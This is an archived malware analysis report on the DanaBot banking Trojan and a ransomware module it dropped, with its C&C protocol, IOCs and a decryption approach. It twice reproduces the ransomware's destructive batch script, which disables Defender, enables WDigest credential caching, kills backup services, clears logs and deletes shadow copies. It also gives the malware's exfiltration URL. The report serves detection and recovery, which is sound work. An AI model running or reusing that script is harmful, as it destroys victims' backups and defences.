DanaBot Demands a Ransom Payment
By deugenio
Published: 2019-06-20 · Archived: 2026-04-05 22:41:36 UTC
Research by: Yaroslav Harakhavik  and Aliaksandr Chailytko
It’s been over a year since DanaBot was first discovered, and its developers are still working to improve it and find new
opportunities to collaborate with other malware actors.
Check Point Research has been tracking DanaBot campaigns since August 2018 and recently discovered that some bots
belonging to European campaigns had started dropping an executable file which turned out to be a ransomware written
in Delphi.
DanaBot was already involved in sending spam and cooperating with GootKit in the past, as well as dropping Remcos
RAT on infected machines. While DanaBot is still actively supported, its operators now add new plugins and
configuration files and update various parts of the malware (including string encryption and file name generation
algorithms, and even the communication protocol).
In the following report, we will review the latest updates in DanaBot’s functionality, and take a deep dive into the inner-workings and encryption methods of this new ransomware.
DanaBot Overview
DanaBot is a banking Trojan which is distributed using phishing emails. Links usually lead to either a JavaScript or
PowerShell dropper.
The malware has the following capabilities:
Stealing browsers and FTP clients credentials
Collecting crypto wallets credentials
Running a proxy on an infected machine
Performing Zeus-style web-injects
Taking screenshots and recording video
Providing a remote control via RDP or VNC
Requesting updates via TOR
Bypassing UAC using a WUSA exploit
Requesting updates from C&C server and execute commands
All DanaBot versions communicate with the C&C server via a custom TCP-based protocol over 443 port.
Since its first appearance, DanaBot has spread throughout Europe, Australia, New Zealand, USA and Canada. Several
campaigns were discovered
 which target different countries. A campaign is defined by two hardcoded values:
Campaign ID;
Campaign salt – A number used for a packet validation by the C&C server
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 1 of 22

Campaigns which are currently active are shown in Table 1.
Campaign ID Campaign Salt Countries
2 586856666 None
3 897056567 Italy, Poland
4 645456234 Australia
5 423676934 Australia
6 235791346 Australia
7 765342789 Italy, Poland
8 342768343 Canada, USA
9 909445453 None
11 445577321 Unknown
14 653345567 Canada
15 655222455 Poland, USA
17 878777777 Unknown
18 234456788 Unknown
19 335347974 Unknown
20 113334444 Unknown
24 784356646 Unknown
Table 1 – Active DanaBot campaigns
The Dropper
The initial infection vector is usually an email with a document or a link which leads to a malicious dropper.
One of the latest cases is a new Australian campaign (ID=6) which was discovered by Check Point in April 2019.
DanaBot was spread in its usual way – phishing emails with links to a file uploaded to Google Docs.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 2 of 22

Fig 1: Phishing email examples
The downloaded file turned out to be a VBS script which functions as a DanaBot dropper. The dropper unpacks the
DanaBot downloader DLL into the %TEMP% directory and registers it as a service.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 3 of 22

Fig 2: DanaBot VBS dropper
DanaBot Downloader
The DanaBot downloader is represented by a 32- or 64-Bit DLL which starts by calling its f0 function. After the January
2019 update, the downloader took on many of the main module’s roles: for example, it bypasses UAC and pretends to
be a Windows System Event Notification Service. It communicates with C&C servers, downloads DanaBot plugins and
configuration files, updates itself, and executes the main module.
In January, the DanaBot downloader changed its communication protocol, obscuring it with the AES256 encryption.
The new protocol was described in detail by ESET. The initial communication between an infected machine and a C&C
server is shown in Figure 3.
The main points of the new protocol are:
1. Both the bot and C&C server generate a new AES256 key (AesKey in Figure 1) for every packet they send.
2. The bot sends an RSA public key (RsaSessionKey in Figure 1) to the C&C server which is used by the server to
encrypt its generated AesKeys.
3. The bot encrypts the generated AesKeys with a hardcoded public RSA key (HardcodedRsaKey in Figure 1). The
private key is owned exclusively by the C&C server.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 4 of 22

Fig 3: Encryption in Bot-to-C&C communication protocol
The layout of TCP packets for the latest communication protocol is decribed in the Appendix A.
The DanaBot downloader can be detected by a public RSA key hardcoded into the DLL’s body. It’s usually XOR’ed
with a byte in the range [0x01; 0xFF].
Fig 4: The downloader’s hardcoded RSA public key
The new campaign sample requests the following modules and configuration files:
Modules:
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 5 of 22

Main module
Stealer plugin
VNC plugin
RDP plugin
TOR plugin
Configuration files:
BitVideo – Process list to record
BitFiles – List of cryptocurrency files
KeyProcess – Process list for keylogging
PFilter – List of web-sites for sniffing
Inject (or inject, inj, inj* or in*) – Web-inject configuration
Redirect (redik*) – Configuration for redirection
NonRansomware Distribution
At the end of April, DanaBot C&C server 95.179[.]186[.]57 started including in the list of available modules a new
module, D932613F6447F0C56744B1AD53230C62 for a European campaign with ID=7. The module, which was an
executable file written in Delphi, was named “crypt.”
The new module turned to be a variant of the “NonRansomware” ransomware which enumerates files on local drives
and encrypts all of them except the Windows directory. The encrypted files have a .non extension. A ransom message
HowToBackFiles.txt is placed in each directory which contains encrypted files.
In the beginning of May, this ransomware was found in the Wild.
Fig 5: Ransom message
After its execution, the malware puts a batch file b.bat in %TEMP% and runs it. The batch script contains the following
content:
@echo off
set “__COMPAT_LAYER=RunAsInvoker”
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 6 of 22

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management”
/v ClearPageFileAtShutDown  /t REG_DWORD /d 1 /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v Hidden /t
REG_DWORD /d 1 /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v
SuperHidden /t REG_DWORD /d 1 /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v
ShowSuperHidden /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t
REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest” /v
UseLogonCredential /t REG_DWORD /d 1 /f
net stop mssqlserver
net stop sqlwriter
net stop VeeamEndpointBackupSvc
net stop mssqlfdlauncher
net stop cpqvcagent
net stop TeamViewer
net stop klsbackup2013pro
net stop foxitreaderservice
net stop mysql
net stop mssqlserver
net stop mysql501
net stop veeamdeploysvc
net stop veeamtransportsvc
net stop wuauserv
net stop sysmgmthp
net stop sysdown
net stop adobearmservice
net stop themes
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 7 of 22

net stop sqlbrowser
net stop sql backupmaster
net stop sqlagent$sql2008exp
net stop sqltelemetry$sqlexpress
net stop mssql$sqlexpress
net stop mikroclientwservice
net stop reportserver
net stop sqlserveragent
net stop MSSQL$MIKRO
net stop msdtc
net stop sqltelemetryvv
taskkill /F /IM Veam.EndPoint.Tray.exe
taskkill /F /IM jusched.exe
taskkill /F /IM jucheck.exe
taskkill /F /IM IAStorDataMgrSvc.exe
taskkill /F /IM IAStorIcon.exe
taskkill /F /IM isa.exe
taskkill /F /IM armsvc.exe
taskkill /F /IM TeamViewer.exe
taskkill /F /IM TeamViewer_Service.exe
taskkill /F /IM tv_w32.exe
taskkill /F /IM tv_x64.exe
powercfg.exe -h off
RD /S /Q “C:\Windows\Temp\”
RD /S /Q “C:\Windows\Logs\”
RD /S /Q “C:\Windows\Installer\”
powershell.exe -ExecutionPolicy Bypass
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 8 of 22

Disable-ComputerRestore “C:\”
Disable-ComputerRestore “D:\”
Disable-ComputerRestore “E:\”
Disable-ComputerRestore “F:\”
Disable-ComputerRestore “H:\”
Clear-EventLog “Windows PowerShell”
Clear-RecycleBin -Confirm:$false
vssadmin delete shadows /all
The scripts is responsible for:
Enabling setting for showing hidden files
Disabling Windows Defender
Enabling ClearPageFileAtShutDown to purge the pagefile.sys
Stopping services
Stopping monitoring software (Veeam, TeamViewer, etc.)
Disabling hibernation
Removing logs
Bypassing the PowerShell Execution Policy
Disabling restoration for the following logical disks: C, D, E, F, H;
Clearing EventLog and Recycle Bin
Deleting shadow copies for all volumes
Then the malware schedules a task which will execute the malware every 14 minutes. The full command line for
schtasks.exe is shown in Figure 6.
Fig 6: Ransomware task creation
The obscured name of the task is just a damaged string “SysUtils.” The malware uses a simple algorithm and a
hardcoded key “Hello World!” to decrypt the strings. The developers – deliberately or not – applied this algorithm to a
plain string to create a task name.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 9 of 22

Fig 7: Decrypting schtasks.exe parameters and damaging the task name by the same decryption algorithm
The string decryption algorithm is shown in Figure 8.
Fig 8: Decrypting strings that are used in the ransomware source code
The ransomware enumerates logical drives, visits all the directories except Windows, and encrypts all the files using
AES128. The password is a string representation of the system volume serial number. Every file is encrypted in a
separate thread.
The victim ID which is shown in the ransom message is generated from the password (i.e. C disk serial number)
according to the following algorithm:
Fig 9: Victim ID generation algorithm
Basically, this can be rewritten as the following equation:
where  – encryption key,  – plain text,  – cipher text and  – text index.
As it is impossible to create an inverse function for this equation, it is likely that the malware operators have to
bruteforce the password (p) on the basis of the known victim ID (c) and hardcoded key (k). The following code can be
used to restore the password from the victim ID:
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 10 of 22

Fig 10: Restoring the password by the victim ID
The encryption itself is not obvious unless… it was copy-pasted from the unit tests of the
DelphiEncryptionCompendium (DEC) library. The encryption function is a slightly modified DemoCipherFile
procedure of the library’s test project. The main difference is using Panama hash instead of SHA1.
A comparison of the disassembly code of the ransomware and the corresponding source code of DEC test project is
shown in Figures 11-12.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 11 of 22

Fig 11: Ransomware: Objects initialization
Fig 12: DEC: Objects initialization
There is a very detailed description of the encryption process in the source code.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 12 of 22

Fig 13: Comments for EncodeFile
So the only thing that is needed to restore the encrypted files is to call the DecodeFile function for all the encrypted files
with a password bruteforced using the known victim ID.
A GUI tool for file decryption is attached at the end of this article.
The layout of an encrypted file and its structure are shown in Figure 14 and Table 2.
Fig 14: Encrypted file layout
Field Size
Cipher Identity 4 Bytes
CipherMode 1 Byte
Hash Identity 3 Bytes
Seed Size 1 Byte
Seed Seed Size
Cipher Text Size 4 Bytes
Cipher Text Cipher Text Size
Checksum Size 4 Bytes
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 13 of 22

Checksum Checksum Size
Table 2: The structure of an encrypted file
Finally, the malware checks a network connection and sends information about the infected PC to
encrypter[.]webfoxsecurity[.]com. It first detects the version of Windows, generates a unique ID, retrieves the user name
and builds the following string:
{“#ersio.”:”1.4.3″, “win”:”<WINDOWS_VERSION>”, “hwid”:”<UNIQUE_ID>”, “UserName”:”User”, “Admin”:”0″}
Example:
{“#ersio.”:”1.4.3″, “win”:”Windows 7 Professional 32-bit”, “hwid”:”00029646″, “UserName”:”User”, “Admin”:”0″}
UNIQUE_ID is generated based either on UUID (by using UuidCreateSequential) or on a volume serial number if
UuidCreateSequential failed.
The resulting string is encoded to Base64 and is sent to the previously mentioned address by using a GET request in the
following format:
http:[/]/encrypter[.]webfoxsecurity[.]com/api/key?k=<BASE64>
Conclusion
For almost a year, DanaBot has been extending its capabilities and evolving into a more sophisticated threat. We assume
its operators will continue to add more improvements. Check Point provides a protection from these threats. We’ll keep
an eye on it and update you further.
A lot of ransomware still remain a relatively stable source of income for cyber criminals. Therefore such simple “copy-paste” encryptors as the one that was described here will continue to emerge constantly. Note – In general, we do not
recommend paying ransom to decrypt your files, and especially not in a case like this.
Appendix A. DanaBot Downloader’s payload packet layout
The unencrypted packet layout and the meaning of its fields are shown in Figure 15 and Table 3.
Fig 15: Unencrypted initial payload packet layout
Table 3: Packet layout
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 14 of 22

Offset Size Purpose
0x00 0x04 Packet header size (0xA7)
0x04 0x08 Random number (rand_1)
0x0C 0x08 Sum of header size and rand_1
0x14 0x04 Campaign ID
0x18 0x04 Message ID
0x1C 0x04 Message parameter
0x20 0x04 Random number (rand_2)
0x24 0x04 Constant (0x00)
0x28 0x04 Architecture (32, 64)
0x2C 0x04 Windows version token
0x30 0x04 0 or 0x03E9 (depends on Message ID)
0x34 0x04 Constant (0x01)
0x38 0x04 Admin status
0x3C 0x08 Constant (0x01)
0x44 0x01 Border
0x45 0x20 Bot ID
0x65 0x01 Border
0x66 0x20 Module or Checksum #1 (depends on Message ID)
0x86 0x01 Border
0x87 0x20 Checksum #2
Checksum #1 is required only in certain requests, such as an initial request when a bot communicates with the C&C
server to announce its presence. Checksum #2 is placed at the end of every payload that the bot sends to the C&C
server. Checksums are calculated by the following formulas:
The encrypted packet is preceded by a 24-byte header. The first 8 bytes contain the size of payload packet, the next 8
bytes contain a random 2-byte number, and the last 8 bytes are equal to the sum of the payload size and the random
number.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 15 of 22

Fig 16: Example of a payload packet header
Appendix B. DanaBot IOCs
Alive C&C servers Status
192.71.249.51 Alive
178.209.51.211 Alive
185.92.222.238 Down
89.144.25.104 Down
89.144.25.243 Alive
84.54.37.102 Down
149.28.180.182 Alive
95.179.186.57 Alive
Droppers location on GoogleCloud
hxxps://docs.google[.]com/uc?id=1q4EYE4umvEFfdlL4_IshSQ4UqnhWAg9t
hxxps://docs.google[.]com/uc?id=1gu8efqkSDDXZIDMX2cnFc73NyyuVYIF0
WebInject & Redirect IP and domains
194.76.225.28
185.189.149.235
demo.maintrump.org
kaosutdoaaf.pw
kaosutdoaaf6.pw
kaosjdoaaf6.pw
kadosjdoaaf6.pw
kadosjdoaf6.pw
kadosjdoafa.pw
kadosjdoiafa.pw
kdosjdoiafa.pw
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 16 of 22

kduwouewpew.pw
kdguwoewpew.pw
sfjskdjfwoiewwegroup.tech
brekwinarew.site
jklfsdkfjhwefjosdf.top
jklfsdkfjhwefjosdf.xyz
goskilindad.site
mon-sta.com
lindakiski.top
lidaskiheg.space
lnet4-data.com
net4-data.com
lidaskiheg.site
bruksialopws.icu
brukaisloap.club
braksiolsa.top
brukiloapos.xyz
oneuisopeweh.icu
okjauwbueiws.xyz
okjauwbueiws.top
onueilsndsuywe.xyz
gustemiaksa.icu
thegiksjoute.online
guksuoiew.top
gustokiloe.xyz
gousikolka.space
thenautorern.tech
nautorern.xyz
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 17 of 22

kipokahynr.top
kipokahynr.xyz
muabolksae.club
muoklaiow.xyz
Examples of DanaBot modules
Module MD5
VBS Dropper a1f119be2c55029f4d38f9356a1cc680
Downloader (x86) b0c1bdc0b21aa99e2d777eef39c18a11
Downloader (x64) 11e7e83043259310a5ae8689b4e34992
Main module (x86) ca8c3113b9afa9d8bb8fe1f6653a9547
Main module (x64) eacd1da520a33d842b09cef81606c745
Plugin MD5
Stealer (x86) ee89e89b0ee8f5b3241e69b4a6632b00
Stealer (x64) 7efc6b42338b28470716c126a3c1cc46
VNC d917226cba970dcf3f2b7c59cf212221
TOR bcf4a4a96b6dacd026d507d0e49797C6
RDPWrap 0f54d5a13821c0e31eb5730a4aba75f2
Appendix C. NonRansomware IOCs
md5 sha256
a3629977d2c9f7eb30a13bdce14e3f45 5dad162cbc990d3f45d2fe3b9d96ebd0c4af92997f621a207387201ed6b34893
e48067d2ad6adcbf2e4cf7e705d4bd82 8a21e1224a8f1d7dd9d4e42c78c829fb82808631577477e8f699f15feb7c8988
Spawned processes
C:\Users\<USER_NAME> \AppData\Local\Temp\b.bat
C:\Windows\System32\schtasks.exe /c /Create /SC MINUTE /MO 14 /TN
\xc3\xab\xc3\xb4\xc3\xa7\xc3\x89\xc3\xa5I\xc3\xb5\xc3\xa4 /TR “<FILE_PATH>” /F
Dropped Files
C:\Windows\System32\cmd.exe /c %TEMP%\b.bat
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 18 of 22

<PATH_WITH_ENCRYPTED_FILES>\HowToBackFiles.txt
Network
http://encrypter.webfoxsecurity.com/api/key?k=
Mutexes
RunningNow
Strings
xihuanya@protonmail.com
HowToBackFiles.txt
@echo off
set “__COMPAT_LAYER=RunAsInvoker”
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management” /v ClearPageFileAtShutDown  /t REG_DWORD /d 1 /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v Hidden
/t REG_DWORD /d 1 /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v
SuperHidden /t REG_DWORD /d 1 /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v
ShowSuperHidden /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v
DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest” /v
UseLogonCredential /t REG_DWORD /d 1 /f
net stop mssqlserver
net stop sqlwriter
net stop VeeamEndpointBackupSvc
net stop mssqlfdlauncher
net stop cpqvcagent
net stop TeamViewer
net stop klsbackup2013pro
net stop foxitreaderservice
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 19 of 22

net stop mysql
net stop mssqlserver
net stop mysql501
net stop veeamdeploysvc
net stop veeamtransportsvc
net stop wuauserv
net stop sysmgmthp
net stop sysdown
net stop adobearmservice
net stop themes
net stop sqlbrowser
net stop sql backupmaster
net stop sqlagent$sql2008exp
net stop sqltelemetry$sqlexpress
net stop mssql$sqlexpress
net stop mikroclientwservice
net stop reportserver
net stop sqlserveragent
net stop MSSQL$MIKRO
net stop msdtc
net stop sqltelemetryvv
taskkill /F /IM Veam.EndPoint.Tray.exe
taskkill /F /IM jusched.exe
taskkill /F /IM jucheck.exe
taskkill /F /IM IAStorDataMgrSvc.exe
taskkill /F /IM IAStorIcon.exe
taskkill /F /IM isa.exe
taskkill /F /IM armsvc.exe
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 20 of 22

taskkill /F /IM TeamViewer.exe
taskkill /F /IM TeamViewer_Service.exe
taskkill /F /IM tv_w32.exe
taskkill /F /IM tv_x64.exe
powercfg.exe -h off
RD /S /Q “C:\Windows\Temp\”
RD /S /Q “C:\Windows\Logs\”
RD /S /Q “C:\Windows\Installer\”
powershell.exe -ExecutionPolicy Bypass
Disable-ComputerRestore “C:\”
Disable-ComputerRestore “D:\”
Disable-ComputerRestore “E:\”
Disable-ComputerRestore “F:\”
Disable-ComputerRestore “H:\”
Clear-EventLog “Windows PowerShell”
Clear-RecycleBin -Confirm:$false
vssadmin delete shadows /all
Appendix D. Check Point Signatures
Malware CP Product Detect Name
DanaBot
Anti-Bot Trojan.Win32.DanaBot.*
Thread Emulation Trojan.Win.DanaBot.A
Sand Blast Agent Trojan.Win.DanaBot.B
NonRansomware
Anti-Ransomware Ransomware.Win.TouchTrapFiles.A
Sand Blast Agent Gen.Win.DisWinDef.A
Decryption tool
Click here to download the NonDecryptor tool.
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 21 of 22

Source: https://research.checkpoint.com/danabot-demands-a-ransom-payment/
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
Page 22 of 22